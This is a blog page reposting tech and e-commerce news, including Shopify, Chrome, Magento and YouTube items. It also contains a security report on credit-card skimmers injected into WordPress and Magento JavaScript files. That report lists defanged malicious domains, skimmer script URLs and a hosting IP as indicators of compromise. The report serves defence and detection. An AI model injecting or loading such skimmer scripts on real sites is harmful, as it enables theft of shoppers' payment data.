Shopify Offering Startup Loans to Merchants – No Sales or Credit Checks Required Overall rating: ★★★★★ 5 based on 23 reviews
5 1

BlogSimplio Labs Blog

“Once we accept our limits, we go beyond them.”

Albert Einstein

Shopify Offering Startup Loans to Merchants – No Sales or Credit Checks Required

Business Advice, E-Commerce, What's New No Comment

Shopify is looking to spur entrepreneurship and boost its merchant count by removing a fundamental barrier to launching a business: startup capital.

The Ottawa-based e-commerce giant announced an expansion of its Shopify Capital program Tuesday that will see the company provide initial loans of $200 to qualifying applicants looking to test out entrepreneurship.

In its most recent earnings report last fall, Shopify highlighted how its existing Shopify Capital program issued $141 million in merchant cash advances and loans in the third quarter of 2019, an increase of 85 per cent year-over-year. Until now, the program’s financing terms have typically been tied to a business’s sales history on the platform.

These early-stage loans, on the other hand, can be approved without any sales or a credit check. In a release, the company positioned the idea as an alternative to dipping into savings, borrowing from friends and family or racking up credit card debt.

Kaz Nejatian, vice-president of Shopify’s financial solutions division, wrote on Twitter that the new program was aimed at entrepreneurs struggling to get started with a business idea, such as recently landed immigrants who haven’t built up a financial foundation yet or a founder targeting non-traditional industries.

The move to ease the on-boarding of new users comes amid a broader push to continue growing the number of merchants using Shopify’s platform.

Though the company passed a sizeable milestone with its one-millionth user in 2019, the company’s year-to-year growth in merchant base has showed signs of slowing in recent years. This has pushed Shopify to increase expansion efforts outside its core North American market; CFO Amy Shapero said during the company’s most recent quarterly earnings call that it was seeing its most rapid growth in international markets.

Shopify itself has been having a strong start to 2020 with its shares hitting new highs on the Toronto and New York stock exchanges. The firm’s shares on the TSX were trading at $576.25 on Tuesday, an increase of nearly nine per cent since the start of the year.

Source: Ottawa Business Journal

Cyber Security Trends 2020 – How Unprepared Are We?

Developers, What's New No Comment

Spending on cybersecurity is on an explosive rise. When new ransomware attacks occur every 14 seconds followed by infiltration attempts on large volumes of data putting millions of people at risk, cybersecurity ought to be discussed. As we usher into 2020, the scope of discussion has gone beyond the upcoming security products & services to new innovations in hacking. If you haven’t woken up to combat such attacks, you could be the next target.

Before 2019 ends, the US alone would have had spent USD 45 billion and that’s not just any other market cap figure. As per IDC, global spending on cybersecurity will touch USD 103 billion.

Increased Router-based attacks

Being positioned at the heart of the network operations, Routers monitor all the devices and hence, are low hanging fruits for hackers. Since they aren’t updated as frequently as recommended, Routers are prone to a series of attacks. Moreover, there is a swathe of models from different brands which makes it complicated for the manufacturers to upgrade or offer replacement to the older devices.

Such attacks are targeted to retrieve configuration files by exploiting commands such as SNMP and SMI. As per a report from Akamai, flaws in UPnP implementations empowered hackers to inject NAT rules while affecting 65,000 routers and 4.8 million more at risk.

Last year, Kaspersky reported a similar attack wherein systems in Russia and Iran were left with an ASCII rendition of the American Flag followed by a message ‘Don’t mess with our elections’.

Given the increase of routers under attacks, users, at homes, agencies and offices must take essential steps to ensure basic security. More than just changing the default router password in settings, it’s high time that users act proactively and learn about the security of their routers. They can access the router settings via the default IP 192.168.1.1 which is pre-specified by the router companies.

Henceforth, enabling WPA2 encryption, updating the router, using VPN and other 3rd party services can help to cut down the risks by 70%. In certain cases, changing the default IP altogether can curb the vulnerabilities.

Growth of 5G & increasing threats in the cloud

With impressive infrastructure deployments already in progression, 5G is prepared to grow in major markets such as India. In fact, IoT device manufacturers are experimenting with devices connecting directly with the 5G networks while not depending upon the Wi-Fi routers anymore. However, eliminating the central point of controlling networks at homes and small offices has raised the fears of making devices prone to more attacks. Routers are helpful in monitoring all the devices in the network and their absence means screening each one of them manually.

Following up with abundant data streaming capacities provided by 5G networks, cloud storage may not be the securest of all anymore. Given such bandwidth efficiency to back-up, upload and download huge volumes of data, hackers have already discovered their newer targets. At the enterprise level, this gets scarier as on-premise migration to the cloud continues to grow explosively. However, by 2020, 80% of such deals will attach network firewalls and secure web gateways to cloud-based access security brokers (CASBs).

Increasing use of mobile as an attack vector

By the end of 2018, mobiles had already topped the list of potential gateways to infiltration and hacking attempts. Since all our communications, whether personal or professional have moved to the mobile, we are inching towards a greater risk of exposing ourselves to the unknown, unintentionally. As per the RSA’s Current State of Cybercrime Whitepaper, 70% of fraudulent transactions were triggered by a mobile device in 2018. Not to miss, the 680% rise in frauds from mobile apps since 2015.

Phishing is back – stronger & scarier

Phishing may be old yet practiced full throttle. In fact, it has expanded into different versions such as smishing (phishing through SMS) or vishing (phishing through live calls). As per Verizon’s Data Breach Investigation Report 2019, phishing accounts for 32% of data breaches and 78% of cyberespionage incidents. These actions across emails, SMSs, social media posts and IRS phone calls lure the victim to give up personal information such as login credentials, or OTPs including transactions. Despite aggressive awareness campaigning, impersonating a reputed brand and extracting valuable information from the customer hasn’t stopped and it doesn’t look like stopping in 2020.

Going forward – hacking will get more innovative

Before you thought of deploying AI to predict attacks, hackers had already implemented strategies to dodge your preparations. Besides using automation for phishing (sending emails, social media messages), it could scan millions of systems, identify the ones most vulnerable and launch mass data infiltration attacks. Therefore, such abusive use of Artificial Intelligence deserves superlative defense such as – 50% of enterprises pledge to utilize AI tools to secure their systems.

 

Source: Business2Community

Google plans to give slow websites a new badge of shame in Chrome

What's New No Comment

Google is experimenting with a badge of shame for websites that load slowly in Chrome. “In the future, Chrome may identify sites that typically load fast or slow for users with clear badging,” explains a blog post from the Chrome team. “This may take a number of forms and we plan to experiment with different options, to determine which provides the most value to our users.”

A new badge could appear in the future that’s designed to highlight sites that are “authored in a way that makes them slow generally.” Google will look at historical load latencies to figure out which sites are guilty of slow load times and flag them, and the Chrome team is also exploring identifying sites that will load slowly based on device hardware or network connectivity.

Google is experimenting with having a loading screen (splash screen) to warn Chrome users, or a loading progress bar that would appear green if the site is fast and, presumably, red if it’s slow. “We are building out speed badging in close collaboration with other teams exploring labelling the quality of experiences at Google,” explains the Chrome team. “We are being very mindful with our approach to setting the bar for what is considered a good user experience and hope to land on something that is practically achievable by all developers.”

It’s not clear exactly when this new badging system will appear in Chrome, but Google unveiled its plans at the company’s Chrome Dev Summit in San Francisco today. The company has carefully worded its announcement with lots of “may” hedges, so it’s likely Google is looking for immediate feedback from web developers before it progresses.

Google also unveiled its vision for the future of Chrome today, and it appears the company is focusing on WebAssembly, powerful capabilities, and Progress Web Apps (PWAs). Hopefully this will mean even more powerful web apps soon, and ones that feel a lot more like native apps.

Source: The Verge

Magento Warns E-Commerce Sites to Upgrade ASAP to Prevent Attacks

E-Commerce, What's New No Comment

The popular e-commerce platform Magento is urging web administrators to install its latest security update in order to defend against malicious attacks in the wild that could exploit a critical remote code-execution vulnerability.

While the company didn’t specify what kinds of potential attacks that websites should be concerned about (Threatpost reached out for comment on this), Magento is a common target for the Magecart association of threat groups, which compromise websites built on unpatched e-commerce platforms in order to inject card-skimming scripts on checkout pages. The scripts steal unsuspecting customers’ payment card details and other information entered into the fields on the page.

The vulnerability (CVE-2019-8144), which carries a severity ranking of 10 out of 10 on the CVSS v.3 scale, could enable an unauthenticated user to insert a malicious payload into a merchant’s site through Page Builder template methods, and execute it. Page Builder allows websites to design content updates, preview them live and schedule them to be published. The bug specifically exists in the preview function.

The flaw affects Magento 2.3, and was patched in in Magento Commerce 2.3.3 and with the security-only patch 2.3.2-p2, released in October. The company warned that patching will have the side effect of “blocking administrators from viewing previews for products, blocks and dynamic blocks’; but, it said it will re-enable the preview functionality as soon as possible.

“We recommend that all merchants, even those who have already upgraded to 2.3.3 or applied security-only patch 2.3.2-p2, review the security of their Magento site to confirm that it was not potentially compromised before upgrade,” Piotr Kaminski of the Magento security team wrote in a posting on Monday. “Applying this hot fix or upgrading…will help defend your store against potential attacks going forward, but will not address the effects of an earlier attack.”

The same update patches several other critical emote-execution flaws with a CVSS v.3 score of 9 and above, as well as cross-site scripting (CSS) issues.

The warning comes as Magecart activity and infrastructure continues to saturate the web. According to analysis from RiskIQ last month, there are now 573 known command-and-control (C2) domains for the group, with close to 10,000 hosts actively loading those domains. In all, RiskIQ has detected almost 2 million (2,086,529) instances of Magecart’s javaScript binaries, with over 18,000 e-commerce hosts directly breached.

“It is unfortunate that this kind of attack is still succeeding even though a mitigation is quite straightforward,” said Mounir Hahad, head of Juniper Threat Labs at Juniper Networks, via email. “As a last resort, website owners should periodically check the integrity of their script code, which can be as simple as calculating a checksum every few minutes to look for an unexpected change.”

Credit Skimmers Vulnerability

Developers, E-Commerce, What's New, Wordpress No Comment

We often write about malware that steal payment information from sites built with Magento and other types of e-commerce CMS.

When discussing credit card skimmers like Magecart, it’s sometimes overlooked that WordPress also has a decent share in the ecommerce segment. There are numerous popular plugins that can easily turn a WordPress site into a full-featured online store. In fact, Woocommerce alone has over 5 million installations.

Credit Card Skimmer Injected in WordPress Core

Our friend Salvador Aguilar over at Kinsta recently shared a few samples of malware found in the WordPress core files wp-includes/js/wp-util.min.js and wp-includes/js/admin-bar.min.js.

These Javascript files both contained the following injected code, found at the very top.

Magento WordPress Skimmer atob
Injected malware found in wp-includes/js/wp-util.min.js and wp-includes/js/admin-bar.min.js

This injected code is a typical credit card skimmer, with “e.src=atob” containing the encoded URL of the external script. In this case, it is decoded to “hxxps://zendesk-chart[.]com/top/aco.js”.

Common Skimmer Variants Found on Magento

We regularly find these types of injected scripts on Magento sites. They use variations of atob (base64) obfuscation, along with hundreds of different domains and customised URLs.

For example, on one Magento site we found a nearly identical copy of the skimmer script (referenced above), with only a slight variation. This variant loads the skimmer from hxxps://zendesk-chart[.]com/uk/google.js (instead of /top/aco.js), which works with the checkout form for that particular site.

Domains Used by This Malware Campaign

Zendesk-chart[.]com was created on September 13, 2019, and it is now hosted on 185.254.121.64.

A quick lookup shows that the same server in Russia hosts the following domains:

jquery-web[.]com – Creation Date: 2019-01-21
jquery-stats[.]com – Creation Date: 2019-03-30
tracker-visitors[.]com – Creation Date: 2019-04-19
jquerycodemagento[.]com – Creation Date: 2019-08-11
gooqleadvstat[.]com – Creation Date: 2019-09-13
gooqlemgrteg[.]com – Creation Date: 2019-09-13
zendesk-chart[.]com – Created on 2019-09-13
jquerystatic[.]com – Creation Date: 2019-09-13

All of these domains serve multiple versions of credit card stealers that can be found in the wild  injected into various e-commerce sites.

hxxps://jquerycodemagento[.]com/my/jd.js
hxxps://jquery-stats[.]com/u/redacted.js
hxxp:// jquery-web[.]com/wp/redacted.js
hxxps://tracker-visitors[.]com/my/jun.js
hxxps://gooqlemgrteg[.]com/ajax/jquery.js
hxxps://gooqleadvstat[.]com/ajax/maria.js
hxxps://jquerystatic[.]com/good/hard.js
…etc…

Mitigation Steps

What is evident is that this is definitely not a fully automated mass infection, where hackers have a unified solution (list of vulnerabilities and the payload) that fits all scenarios. Each script has been customized—both name and content—for each specific compromised site.

In this malware campaign, the checkout page URLs are detects for each target. From there, custom code works to collect sensitive credit card information from the victim’s checkout form.

The malware itself is CMS agnostic—it doesn’t matter whether the site is using Magento, WordPress, or any other type of e-commerce CMS. If there is a form that accepts payment details and it can be hacked, nothing prevents the bad actor from installing a skimmer there.

E-commerce website owners should take the security of their websites very seriously, since they are ultimately responsible for any customer data breaches resulting from transactions on their online stores. Extra attention should be paid to the hardening and monitoring of web pages and server resources. Perform regular security scans on your web assets to detect malware and other indicators of compromise.

Protect Your Website ASAP!

It is estimated that about a third of all websites are outdated and seriously vulnerable to hacks. What are the chances that one of those sites could be yours? Don’t wait until it’s too late, get in touch with professionals and start protecting yourself today. Consultation is always FREE.

 

OR CALL NOW
(888) 766-3315

Shopify expands into email marketing

E-Commerce, What's New No Comment

Shopify continues to expand beyond its core e-commerce platform with a new product called Shopify Email.

Shopify’s chief product officer Craig Miller and director of product for marketing technology Michael Perry gave me a quick demo of the product yesterday; Miller argued that they’ve created “the first email product designed for e-commerce.”

That means it’s integrated with a merchant’s store on Shopify, allowing them to easily pull their brand assets into their emails, along with product content and listings. They also can see whether those emails actually lead to customers to add products to their carts/purchase them. And they can create customer segments based on the data in Shopify.

“What we’re really proud of here is, we become the expert for them,” Perry said. “Most people we’ve surveyed don’t understand the value of segmentation, so we’ve taken the liberty of assembling the right list to add value for them.”

Shopify Email is currently available as an early access test for a limited group of merchants, ahead of a broader rollout next year. Miller said it will be free for these initial merchants, with general pricing to be announced later.

Other recent additions to Shopify’s product lineup include hardware for brick-and-mortar stores and digital ad tools.

“The common thread among all of [our new products] is to help brands sell directly to their customers,” Miller said. “There’s been a lot of talk lately about direct-to-consumer, but that’s something we’ve doing for a decade and a half without calling it that.”

Facebook Unveils New Logo

What's New No Comment

On Monday, Facebook announced a new logo that will be used to represent itself as a parent company and to distinguish it from its apps, including Facebook app as well as WhatsApp and Instagram.

The new logo was announced through an official blog post alongside a GIF that alternates between different colors representing the different platforms that Facebook owns.

Below is the new logo as it transitions through Facebook, Instagram, and WhatsApp brand colors (Blue for Facebook, green for WhatsApp and purple, red and orange for Instagram.).

“People should know which companies make the products they use. Our main services include the Facebook app, Messenger, Instagram, WhatsApp, Oculus, Workplace, Portal, and Calibra.
Today, we’re updating our company branding to be clearer that these products come from Facebook. We’re introducing a new corporate logo and further distinguishing the Facebook company from the Facebook app, which will keep its own branding.”

“The new brand system uses custom typography, rounded corners, open tracking and capitalization to create a visual distinction between the company and the app.” “We designed the new company wordmark with clarity and openness in mind.”

In June, the company started adding the words “from Facebook” across all its apps. Although it seems unnecessary, and an alarming number of ‘regular’ users are unaware that Instagram and WhatsApp are owned by Facebook.

Over the coming weeks, Facebook will start using this new branding in its products so you’ll start to see it on things like the login page for Instagram (see photos above).

 

Source: Facebook Newsroom

Rewind Offers Free Holiday Data Backups for E-Commerce Platforms

E-Commerce, What's New No Comment

Rewind, a leading cloud data backup provider for e-commerce and cloud platforms, today announced the launch of Rewind: One-Time, a limited-time, complimentary version of its top-rated data protection software. Helping merchants on Shopify and BigCommerce, Rewind: One-Time can protect and quickly restore a retailer’s online store during the holiday shopping season.

“The holiday season can be an exciting time for merchants, but it can also be quite overwhelming with increased traffic to their stores. We’re excited to welcome the complimentary Rewind: One-Time app to our app store so that merchants can restore their data during the most critical time of the year,” said Fatima Yusuf, Strategic Partnerships Lead, Shopify.

Store uptime is essential for small and medium-sized retailers relying on cloud applications. Rewind has found that online stores have a one in five chance of losing their data at some point and time. Data disasters can happen from malicious acts, third-party integrations, or human error. Available now through December 31, 2019, Rewind: One-Time allows retailers to conduct a free, one-time backup of up to 10,000 products and related data tied to their e-commerce storefront so they can limit any downtime due to data issues.

“Data loss and the resulting downtime can be devastating to an ecommerce business. The Rewind for BigCommerce solution gives BigCommerce sellers the security they need to focus on growing their business — not recovering lost data. We’re pleased to be able to offer Rewind’s excellent integration and world-class customer support to our customers,” said MaryAnn Bekkedahl, SVP of Global Business Development, BigCommerce.

As minutes matter, retailers who take advantage of Rewind: One-Time, will be able to restore their data, to the exact day/time they installed. The one-time backup for BigCommerce includes product, brand, category, option set, and option data, while the one-time Shopify backup includes products, product images, custom collections and smart collections – the backups will be stored indefinitely in the secure Rewind Vault™.

“We want to ensure every BigCommerce and Shopify merchant knows their store data is fully protected this season so they can focus on generating sales, especially on peak days like Black Friday, Small Business Saturday and Cyber Monday,” said Mike Potter, CEO of Rewind. “With account-level data protection from Rewind: One-Time, retailers can ring in holiday sales rather than spend hours trying to recover deleted products or repair broken links and pages.”

Rewind: One-Time users can upgrade to one of the paid plan options at any time during the holiday season or beyond. Paid Rewind subscriptions add the ability for merchants to take advantage of ongoing, comprehensive backups so they can painlessly restore their full store experience (or select products, images, etc.) to any chosen date/time.

Download Rewind: One-Time

Adobe Introduces New Commerce Features For Magento

E-Commerce, What's New No Comment

Adobe is rolling out new capabilities to its enterprise eCommerce platform Magento that are targeted to small to medium-size businesses (SMBs) and mid-market merchants, Adobe said in a press release on Monday (Oct. 22).

Adobe is unveiling these latest features at MagentoLive Europe 2019, being held in Amsterdam Oct. 22-23. The improvements to the commerce platform aim to improve customers’ shopping experience.

“We’re now at an inflection point where companies of all sizes are perpetually challenged by soaring customer expectations to deliver amazing brand experiences. We’re committed to bringing Adobe’s enterprise-grade commerce capabilities to our SMB and mid-market customers to help them grow their business,” Adobe said in the release.

The release of Magento 2.3.3 includes performance and security enhancements to help merchants stay compliant with new regulations. Enhanced features also include integrating with Adobe Stock, an Amazon sales channel for the U.K., cloud infrastructure with Microsoft and an Adobe Sensei-powered product suggestion tool.

“We’re bolstering our multi-cloud capability by making Magento Commerce available on both Microsoft Azure and Amazon Web Services,” the release said.

The “highly anticipated” Adobe Stock integration with Magento offers a searchable interface to find, preview and embed art, such as photos and videos. Adobe Stock has over 130 million images, templates, 3D assets, stock videos and premium collection images.

Adobe acquired Magento’s cloud-based eCommerce platform last year for $1.68 billion. A Shopify competitor, it counts Coca-Cola, Warner Brothers Music, Canon and Nestle as customers.

Commerce Cloud was launched by Adobe in March. This fully managed cloud-based version of the Magento platform is fully integrated with benchmark Adobe tools like analytics, marketing and advertising. Amazon and Google integrations were also added.

On Amazon, merchants can automatically manage their inventory directly from the Magento platform. Users can set pricing rules for the Amazon sales channel, handle multiple brands at a time with access to multiple accounts, and get access to Amazon product data.

Magento also introduced a free native integration with Google Shopping that will let Magento admins manage Google ads from the Magento dashboard, as well as Google Merchant Center accounts.

YouTube Is Making Hard For the Copyright Holders to Make Unfair Claims Against The Creators

Uncategorized, What's New No Comment
youtube copyright claims

YouTube Company found that most of the copyright holders are using unfair means to take revenue away from the creators. The news appeared first on Search Engine Journal.

For most of the people, YouTube’s copyright system is a mess as it places the burden on the creators to dispute the copyright claims, in turn, the copyright holders use the manual claiming tool to seize revenue arising from the videos often before the YouTuber (creator) takes a chance to respond.

But now YouTube from continuous requests form the content creators is updating this tool so that creators do not face any loss. This shall take place in the mid of September and YouTube will do this by changing its Content ID policy, YouTube mentions this in their blog post that by doing so many of the copyright claims shall be cut down. In other words, the right holders will not be able to size money from the YouTube videos by filing any claim and especially when the video is registered in someone’s name and appears for a small period of time on the channel or appears in the background of certain video.

YouTube has now made it mandatory for the people who are filing copyright infringement claims to provide a timestamp for the exact part of the video or the video’s they are reporting. The company also states that they will revoke user’s access to the manual claims if they continuously fail to provide accurate manual timestamps. An advantage of timestamps is that the manual claim recipient will see the timestamp as indicated by other party/parties that will make it easy to find out which part of the video needs to be edited.

To solve this issue they can either dispute the claim or can alter the video by using YouTube’s updating editing tools. Other than this the creators can shut down or remove all sounds, they can even swap them out easily with one of the platforms free to use songs from their audio library.

YouTube has a database of files on which it scans the video uploads so as to find the audio and video matches through its Content ID technology. Any copyright infringement found automatically leads to automated content ID (it’s a video platform system that detects an upload uses another person’s intellectual property claims, then they can earn from it as well) claims.

YouTube believes that by doing so many of the manual claiming privileges of labels or other right holders that get continuously breached will be stopped.

The changes made by the company will only effect manual claims and will have no impact on music found automatically by YouTube’s Content ID system. The company states that since it was implemented it has cleared many claims and has paid many right holders an amount of dollar 3 billion a very big amount.

The company states that they will continuously design ways to improve the creator’s copyright experience without altering the rights of the copyright owners.